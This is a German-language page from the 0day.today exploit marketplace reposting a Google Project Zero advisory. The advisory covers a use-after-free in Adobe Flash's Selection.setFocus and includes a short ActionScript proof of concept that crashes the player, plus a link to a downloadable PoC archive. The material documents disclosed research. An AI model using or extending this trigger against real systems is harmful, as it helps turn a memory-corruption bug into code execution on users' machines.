0day.today - Größte Exploit-Datenbank der Welt.

Wähle Deine Sprache:

Dinge, die Du wissen solltest:

Wir benutzen eine Hauptdomain DOMAIN_LINK

Wenn Du den Exploit kaufen, oder für einen Service bezahlen möchtest, musst Du Gold kaufen.

We accept currencies: [contact admin to find more]

Wir wollen nicht, dass Du unsere Seite als ein Werkzeug für Aktivitäten wie Hacking verwendest. Illegale Aktionen, die andere Benutzer oder Webseiten betreffen, für die Du keine Zugriffsrechte hast, führen dazu, dass der Account gebannt und alle Daten von diesem unwiderruflich gelöscht werden.

Die Administratoren dieser Seite benutzen nur die offiziellen Kontaktdaten. Achte auf Betrüger!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

Ich bin ein registrierter Benutzer von 0day.today. Ich möchte diesen Screen in Zukunft nicht mehr sehen

Was soll ich als Erstes tun ?

Lies [ Vereinbarung ]
Lies [ Senden ] Regeln
Besuche [ FAQ ] page
[ Registrieren ] Profil
Bekommen [ GOLD ]
Wenn Du möchtest [ Verkaufen ]
Wenn Du möchtest [ Kaufen ]
Wenn Du vergessen hast [ Account ]
Fragen [ [email protected] ]

Hauptlinks

You can contact us by

Mail:

[email protected]

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ Wiederherstellen ]

You can contact us by:

Mail:

[email protected]

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Adobe Flash - Selection.setFocus Use-After-Free

Autor

Google Security Research

Risiko

[

Security Risk Medium

]

0day-ID

Kategorie

Datum hinzufügen

CVE

Betriebssystem

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=841
 
There is a user-after-free in Selection.setFocus. It is a static method, but if it is called with a this object, it will be called on that object's thread. Then, if it calls into script, for example, by calling toString on the string parameter, the object, and its thread will be deleted, and a use-after-free occurs.
 
A minimal PoC follows:
 
var mc = this.createEmptyMovieClip( "mc", 1);
var f = Selection.setFocus;
mc.f = f;
mc.f({toString : func});
 
function func(){
     
    mc.removeMovieClip();
     
        // Fix heap here
 
    }
 
A sample SWF and fla are attached. This PoC crashes in Chrome on 64-bit Linux
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40307.zip

#  0day.today [2024-07-02]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Adobe Flash - Selection.setFocus Use-After-Free

Report Error

Report Error